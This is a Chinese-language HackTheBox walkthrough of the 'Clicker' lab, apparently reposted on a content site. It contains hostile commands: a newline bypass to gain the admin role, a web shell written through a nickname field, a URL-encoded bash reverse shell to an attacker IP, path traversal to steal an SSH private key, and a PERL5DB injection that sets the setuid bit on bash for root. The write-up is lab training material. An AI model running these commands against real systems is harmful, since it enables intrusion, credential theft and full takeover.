[渗透测试学习] Clicker - HackTheBox

文章目录

    • 信息搜集
    • 代码审计
    • 反弹shell
    • 提权


信息搜集

nmap扫描一下端口

nmap -sV -sC -v -p- --min-rate 1000 10.10.11.232

在这里插入图片描述

扫描结果

22/tcp    open  ssh
80/tcp    open  http    Apache httpd 2.4.52 ((Ubuntu)) //重定向
111/tcp   open  rpcbind 2-4 (RPC #100000)

我们往下看发现启用了nfs协议

在这里插入图片描述

去网上查询下相关资料 参考文章

NFS最大的功能就是可以透过网络,让不同的机器、不同的操作系统、可以彼此分享个别的档案(share files)。所以,你也可以简单地将它看做是一个文件服务器(file server)。这个NFS服务器可以让你的PC来将网络远程的NFS服务器分享的目录,挂载到本地端的机器当中,在本地端的机器看起来,那个远程主机的目录就好像是自己的一个磁盘分区槽一样(partition),使用上相当的便利。

既然可以远程读取文件,那么我们使用mount命令将远程NFS文件系统挂载到本地目录

在本地创建目录mnt/nfs_file,然后读取根目录文件

sudo mount -o nolock 10.10.11.232:/ ~/test/mnt/nfs_file

注:-o:指定挂载选项,比如读写权限、访问权限等

nolock 是在挂载 NFS 文件系统时的一种选项,用于禁用文件锁定机制,使得同时进行读写操作不受文件锁定限制

我们ls一下,发现zip文件

在这里插入图片描述

解压发现不行,用cp命令复制到本地即可

在这里插入图片描述

由于80端口出现重定向,那么我们添加域名到/etc/hosts

开始进行下一步

代码审计

我们在admin.php注意到有对session进行身份验证,如果验证失败则重定向到index.php

在这里插入图片描述

那么我们尝试得到admin的session,接着在save_game.php找到可利用的地方

<?php
session_start();
include_once("db_utils.php");if (isset($_SESSION['PLAYER']) && $_SESSION['PLAYER'] != "") {$args = [];foreach($_GET as $key=>$value) {if (strtolower($key) === 'role') {// prevent malicious users to modify roleheader('Location: /index.php?err=Malicious activity detected!');die;}$args[$key] = $value;}save_profile($_SESSION['PLAYER'], $_GET);// update session info$_SESSION['CLICKS'] = $_GET['clicks'];$_SESSION['LEVEL'] = $_GET['level'];header('Location: /index.php?msg=Game has been saved!');	
}
?>

简单分析一下,可以通过foreach对GET参数进行遍历,如果$key不为role(不区分大小写),那么$args[$key] = $value;进行赋值,调用save_profile函数去更新session,修改成功则返回Game has been saved!

这里我们搜索一下$_SESSION['PLAYER']是怎么来的,发现是由username决定的也就是登陆者身份

在这里插入图片描述

那么我们可以借助GET传参role=Admin来更新并得到admin的session,但要绕过if (strtolower($key) === 'role')判断
这里本地测试发现,利用换行符%0a就行了
在这里插入图片描述

反弹shell

我们随便注册登录后点击play进入游戏,然后save的时候抓包

在这里插入图片描述

放行,提示修改成功

在这里插入图片描述

然后退出重新登录,发现多了一个功能

在这里插入图片描述

点进去看看发现有四个用户

有个导出表格export选项,点击得到保存的路径

在这里插入图片描述

访问一下

在这里插入图片描述

我们抓包看看保存的过程发现拓展名可控

尝试修改为php成功

在这里插入图片描述

既然可以修改为php后缀,那么我们寻找下写马的位置。很明显,保存的数据中只有nickname可以让我们写马,而如何修改nickname的值就和刚刚修改role一样的办法

点击play,然后save的时候抓包

(注意?要url编码一下)

在这里插入图片描述

然后还是一样回显保存成功,那么说明成功写入马

继续按照刚刚那样抓包修改导出拓展名为php,然后访问保存路径成功RCE

在这里插入图片描述

我们将反弹shell命令url编码一下,然后执行

?1=bash%20%2Dc%20%22bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E14%2E74%2F1028%200%3E%261%22

成功反弹shell

在这里插入图片描述

我们尝试访问/home/jack发现不行,接着在/opt/manage发现可疑文件

在这里插入图片描述

貌似是二进制文件execute_query的使用说明

我们在连接的靶机开启http服务,使用wget命令下载下来该二进制文件

在这里插入图片描述

然后丢到ida里F5反编译

int __cdecl main(int argc, const char **argv, const char **envp)
{int result; // eaxsize_t v4; // rbxsize_t v5; // raxsize_t v6; // rbxsize_t v7; // raxint v8; // [rsp+10h] [rbp-B0h]char *dest; // [rsp+18h] [rbp-A8h]char *name; // [rsp+20h] [rbp-A0h]char *command; // [rsp+28h] [rbp-98h]char s[32]; // [rsp+30h] [rbp-90h] BYREFchar src[88]; // [rsp+50h] [rbp-70h] BYREFunsigned __int64 v14; // [rsp+A8h] [rbp-18h]v14 = __readfsqword(0x28u);if ( argc > 1 ){v8 = atoi(argv[1]);dest = (char *)calloc(0x14uLL, 1uLL);switch ( v8 ){case 0:puts("ERROR: Invalid arguments");return 2;case 1:strncpy(dest, "create.sql", 0x14uLL);goto LABEL_10;case 2:strncpy(dest, "populate.sql", 0x14uLL);goto LABEL_10;case 3:strncpy(dest, "reset_password.sql", 0x14uLL);goto LABEL_10;case 4:strncpy(dest, "clean.sql", 0x14uLL);goto LABEL_10;default:strncpy(dest, argv[2], 0x14uLL);
LABEL_10:strcpy(s, "/home/jack/queries/");v4 = strlen(s);v5 = strlen(dest);name = (char *)calloc(v4 + v5 + 1, 1uLL);strcat(name, s);strcat(name, dest);setreuid(0x3E8u, 0x3E8u);if ( access(name, 4) ){puts("File not readable or not found");}else{strcpy(src, "/usr/bin/mysql -u clicker_db_user --password='clicker_db_password' clicker -v < ");v6 = strlen(src);v7 = strlen(dest);command = (char *)calloc(v6 + v7 + 1, 1uLL);strcat(command, src);strcat(command, name);system(command);}result = 0;break;}}else{puts("ERROR: not enough arguments");return 1;}return result;
}

然后就卡住了,于是参考下国外师傅写的wp是去读取了jack的id_rsa私钥

这里的参数5是因为在上述代码中如果不为1234中的一个,就会执行第三个命令行参数 argv[2] 的内容复制到 dest 变量中

default:strncpy(dest, argv[2], 0x14uLL);

然后拼接文件路径,然后检查文件是否可读。如果文件不可读或者不存在,程序会输出 “File not readable or not found”。否则,将会构建一个 MySQL 命令并执行它,因为拼接的路径为/home/jack/queries/,所以要先返回上一级目录

payload如下

./execute_query 5 ../.ssh/id_rsa

成功读取

在这里插入图片描述

将这一长串保存下来命名为id_rsa

由于为了确保私钥的安全性,私钥文件应该只对所有者有读写权限

chmod 600 id_rsa

然后注意OpenSSH内容格式不对,所以将三个-修改为五个

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAAB...
-----END OPENSSH PRIVATE KEY-----

直接ssh连接,得到user的flag

ssh -i id_rsa jack@10.10.11.232

在这里插入图片描述

提权

我们sudo发现有monitor.sh,然后cat看下具体内容

在这里插入图片描述

这里注意到两个文件/usr/bin/xml_pp/usr/bin/echo(后者并没有什么特殊用处)

而我们跟进/usr/bin/xml_pp发现是perl脚本运行

在这里插入图片描述

通过搜索得知一种名为perl_startup的提权方式 参考文章

我们直接给monitor.sh赋予/bin/bash权限

sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh
//u+s表示给user用户添加权限,即/bin/bash

然后再bash -p即可(用于启用特权模式(privileged mode)的一个选项,保留有效用户的特权和权限)

得到root的flag

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/612461.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何查看Ubuntu内存的使用情况

在Linux系统中&#xff0c;了解内存使用情况对于系统管理和性能优化非常重要。以下是一些常用的命令&#xff0c;以及它们的详细使用说明&#xff1a; 1. free 命令 用途: free 命令用于显示系统中空闲和已用的物理内存及交换内存。示例: 输入命令: free -m输出解释: 这将以M…

python 爬虫 request get或post传参

爬虫传参 import requestsurl http://www.xxx# get 或 post 传参数据 data {"pageNo": 1652,"pageSize": 10, }headers {Cookie: ,Host: ,Origin: ,Referer: ,User-Agent: , }# get 请求 # res requests.get( # url, # paramsdata, # hea…

重磅消息:2024北京国际智能科技展览会(世亚智博会)官宣定档

在数字新时代的浪潮下&#xff0c;智能科技作为推动社会进步的重要力量&#xff0c;正在以前所未有的速度改变着我们的生活和工作方式。为了进一步推动智能科技的发展和交流&#xff0c;2024北京国际智能科技展览会&#xff08;简称世亚智博会&#xff09;将于2024年6月份在北京…

[C#]winform使用纯opencvsharp部署yolox-onnx模型

【官方框架地址】 https://github.com/Megvii-BaseDetection/YOLOX 【算法介绍】 YOLOX是一个高性能的目标检测算法&#xff0c;它是基于YOLO&#xff08;You Only Look Once&#xff09;系列算法的Anchor Free版本。YOLOX由Megvii Technology的研究团队开发&#xff0c;并在…

在 Windows IIS 生成证书签名请求(CSR)

本操作方法将逐步指导您生成证书签名请求&#xff08;CSR&#xff09;。 这些过程已在Windows 10的IIS 10上进行了测试&#xff0c;但也将在IIS 7.x和8.x中运行。 启动IIS管理器。 Start 开始 IIS管理器。 另外一种快速的方法是打开 运行 命令&#xff0c;然后键入 inetmgr 并…

深度学习算法应用实战 | 利用 CLIP 模型进行“零样本图像分类”

文章目录 1. 零样本图像分类简介1.1 什么是零样本图像分类?1.2 通俗一点的解释 2. 模型原理图3. 环境配置4. 代码实战5. Gradio前端页面5.1 什么是 Gradio ? 6 进阶操作7. 总结 1. 零样本图像分类简介 1.1 什么是零样本图像分类? “零样本图像分类”&#xff08;Zero-shot …

使用懒加载 + 零拷贝后,程序的秒开率提升至99.99%

目录 一、5秒钟加载一个页面的真相二、优化四步走1、“懒加载”2、线上显示 就读取一个文件&#xff0c;为什么会慢呢&#xff1f; 三、先从上帝视角&#xff0c;了解一下啥子是IO流四、写个栗子&#xff0c;测试一下1、通过字符输入流FileReader读取2、通过缓冲流BufferedRea…

Spark---RDD序列化

文章目录 1 什么是序列化2.RDD中的闭包检查3.Kryo 序列化框架 1 什么是序列化 序列化是指 将对象的状态信息转换为可以存储或传输的形式的过程。 在序列化期间&#xff0c;对象将其当前状态写入到临时或持久性存储区。以后&#xff0c;可以通过从存储区中读取或反序列化对象的…

YOLOv8改进 | 检测头篇 | 利用DynamicHead增加辅助检测头针对性检测(四头版本)

一、本文介绍 本文给大家带来的改进机制是针对性的改进,针对于小目标检测增加P2层,针对于大目标检测增加P6层利用DynamicHead(原版本一比一复现,全网独一份,不同于网上魔改版本)进行检测,其中我们增加P2层其拥有更高的分辨率,这使得模型能够更好地捕捉到小尺寸目标的细节…

docker启动mongo

用户名&#xff1a;root 密码&#xff1a;123456 version: 3.1 services:mongo:image: mongo:7container_name: mongorestart: alwaysports:- 27017:27017volumes:- /opt/data/mongo:/data/dbenvironment:TZ: Asia/ShanghaiMONGO_INITDB_ROOT_USERNAME: rootMONGO_INITDB_ROO…

第10.2节-简历匹配性和表现力自查

(点击即可收听) 多次投递简历却没有得到回复时&#xff0c;我们应该对自己的简历进行检查和评估&#xff0c;对比那些优秀的简历 找到自己的不足之处并进行修改。 优秀的简历是反复修改出来的&#xff0c;对于每一个需要靠简历找工作的求职者而言&#xff0c;没有完美的简历&am…

【GoLang入门教程】Go语言几种标准库介绍(六)

文章目录 前言几种库Net库 (网络库&#xff0c;支持 Socket、HTTP、邮件、RPC、SMTP 等)重要的子包和功能&#xff1a;示例 OS库&#xff08;操作系统平台不依赖平台操作封装&#xff09;主要功能&#xff1a;示例 path库(兼容各操作系统的路径操作实用函数)常用函数&#xff1…

在ubuntu上检查内存使用情况的九种方法

在 Ubuntu 中&#xff0c;可以通过 GUI(图形用户界面)和命令行使用多种方法来监视系统的内存使用情况&#xff0c;监视 Ubuntu 服务器上的内存使用情况并不复杂&#xff1b;了解已使用和可用的内存量对于故障排除和优化服务器性能至关重要&#xff0c;因为内存对系统 I/O 速度至…

极狐 GitLab 冷知识:使用 Email 也可以创建 Issue?

前言 在使用 GitLab 时&#xff0c;创建 Issue 和 Merge Request 的方法&#xff0c;除了常规的使用 GitLab Web UI 进行操作和通过 API 调用操作&#xff0c;还有一些比较好玩的&#xff0c;比如使用 Email 来创建。 Incoming email 如果是 Self-Manager 的 GitLab 用户&am…

高精度彩色3D相机:开启崭新的彩色3D成像时代

3D成像的新时代 近年来&#xff0c;机器人技术的快速发展促使对3D相机技术的需求不断增加&#xff0c;原因在于&#xff0c;相机在提高机器人的性能和实现多种功能方面发挥了决定性作用。然而&#xff0c;其中许多应用所需的解决方案更复杂&#xff0c;仅提供环境的深度信息是…

分布式数据库原理及技术实验及个人思考

Hive的数据库及表的存储结构体系讨论&#xff1a; 1.显示hive所在数据库的位置 方法一&#xff1a;一次性临时存储 >hive set hive.cli.print.current.dbtrue 方法二&#xff1a;永久存储 在conf文件夹下修改hive-site.xml配置文件&#xff0c;添加 <property> …

解决matplotlib中文乱码问题

一、修改配置文件&#xff0c;一劳永逸的方法 1. 首先&#xff0c;下载SimHei字体&#xff08;即SimHei.tff包&#xff09;下载地址&#xff1a;SimHei.ttf|字体下载 2. 下载好之后&#xff0c;找到matplotlib文件夹&#xff0c;如下图所示&#xff1a; 如果找不到matplotlib…

基于JavaWeb+BS架构+SpringBoot+Vue智能菜谱推荐系统的设计和实现

基于JavaWebBS架构SpringBootVue智能菜谱推荐系统的设计和实现 文末获取源码Lun文目录前言主要技术系统设计功能截图订阅经典源码专栏Java项目精品实战案例《500套》 源码获取 文末获取源码 Lun文目录 目 录 目 录 III 第一章 概述 1 1.1 研究背景 1 1.2研究目的及意义 1 1.3…

Digital Audio (HDMI)未插入 用Hdmi连接电脑 显示高清数字音频未插入 win10电脑没声音,喇叭上一个叉❌

先说结论&#xff0c;出现这些问题的原因&#xff1a; 未插入音频设备或者硬件问题&#xff08;10%&#xff09;设置错误&#xff0c;未使用显示器音频 &#xff08;30%&#xff09;音频驱动不兼容或者没有驱动&#xff08;50%&#xff09;其他驱动有问题 &#xff08;10%&…

“Tab“ 的新型可穿戴人工智能项链

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗&#xff1f;订阅我们的简报&#xff0c;深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同&#xff0c;从行业内部的深度分析和实用指南中受益。不要错过这个机会&#xff0c;成为AI领…